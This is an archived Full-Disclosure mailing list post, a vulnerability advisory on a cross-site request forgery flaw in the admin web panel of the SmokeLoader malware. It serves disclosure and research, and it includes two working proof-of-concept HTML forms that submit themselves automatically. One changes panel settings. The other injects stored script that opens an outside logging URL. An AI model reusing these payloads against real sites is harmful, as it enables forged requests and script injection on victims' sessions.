lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Message-ID: <CAAHK0WRK-VBH17wT9huuMQ3M65PqGPm=j5h1HLJM+CVmgWf==g@mail.gmail.com>
Date: Mon, 13 May 2024 00:06:06 -0400
From: malvuln <malvuln13@...il.com>
To: fulldisclosure@...lists.org
Subject: Re: [FD] Panel.SmokeLoader / Cross Site Request Forgery (CSRF)

Updated and fixed a payload typo and added additional info regarding the
stored persistent XSS see attached.

Thanks, Malvuln



On Sat, May 11, 2024 at 12:56 AM malvuln <malvuln13@...il.com> wrote:

> Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024
> Original source:
> https://malvuln.com/advisory/4b5fc3a2489985f314b81d35eac3560f_B.txt
> Contact: malvuln13@...il.com
> Media: twitter.com/malvuln
>
> Threat: Panel.SmokeLoader
> Vulnerability: Cross Site Request Forgery (CSRF)
> Family: SmokeLoader
> Type: Web Panel
> MD5: 4b5fc3a2489985f314b81d35eac3560f  (control.php)
> SHA256: 8d02238577081be74b9ebc1effcfbf3452ffdb51f130398b5ab875b9bfe17743
> Vuln ID: MVID-2024-0682
> Disclosure: The smokebot admin web panel is written in PHP for remote
> administration capability. The panel has multiple features like Bot List,
> Task List, Stealer, Miner, Email Grab, KeyLogger etc. The "control.php" PHP
> page contains an HTML FORM using POST method, however there is no CSRF
> security token used by the FORM. This is a unique token per session within
> the FORM, used as a challenge to the server to help prevent
> cross-site-scripting attacks. Therefore, third-party adversaries who can
> lure a panel user to visit an attacker controlled webpage or click an
> infected link may result in the panel users submitting FORMS on an
> attackers behalf. This may result in code execution, data theft, GEO
> location disclosure.
>
>
> Exploit/PoC:
> 1) CSRF to add your own Miner Pool
>
> %3Cform method="post" action="
> http://127.0.0.1/Panel.SmokeLoader/SmokeLoader/Smoke/control1.php?page=miner
> "%3E
> Pool: %3Cinput type="input" name="miner_pool" size="30"
> value="MyPoolFool:666"%3E
> Login: %3Cinput type="input" name="miner_login" size="20" value="gg"%3E
> Password: %3Cinput type="input" name="miner_pass" size="20"
> value="malvuln"%3E
> %3Cinput type="hidden" name="mode" value="miner"%3E
> %3Cinput type="submit" value="SAVE"%3E
> %3Cscript%3Edocument.forms[0].submit()%3C/script%3E
> %3C/form%3E
>
> 2) CSRF to XSS
>
> %3Cform method="post" action="
> http://127.0.0.1/Panel.SmokeLoader/SmokeLoader/Smoke/control1.php?page=miner
> "%3E
> Pool: %3Cinput type="input" name="miner_pool" size="30"
> value=""/%3E%3Cscript%3Ewindow.open('
> https://www.malvuln.com/log.php')%3C/script%3E"%3E
> Login: %3Cinput type="input" name="miner_login" size="20" value=""%3E
> Password: %3Cinput type="input" name="miner_pass" size="20" value=""%3E
> %3Cinput type="hidden" name="mode" value="miner"%3E
> %3Cinput type="submit" value="SAVE"%3E
> %3Cscript%3Edocument.forms[0].submit()%3C/script%3E
> %3C/form%3E
>
>
> Disclaimer: The information contained within this advisory is supplied
> "as-is" with no warranties or guarantees of fitness of use or otherwise.
> Permission is hereby granted for the redistribution of this advisory,
> provided that it is not altered except by reformatting it, and that due
> credit is given. Permission is explicitly given for insertion in
> vulnerability databases and similar, provided that due credit is given to
> the author. The author is not responsible for any misuse of the information
> contained herein and accepts no responsibility for any damage caused by the
> use or misuse of this information. The author prohibits any malicious use
> of security related information or exploits by the author or elsewhere. Do
> not attempt to download Malware samples. The author of this website takes
> no responsibility for any kind of damages occurring from improper Malware
> handling or the downloading of ANY Malware mentioned on this website or
> elsewhere. All content Copyright (c) Malvuln.com (TM).
>

View attachment "4b5fc3a2489985f314b81d35eac3560f_B.txt" of type "text/plain" (3774 bytes)

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ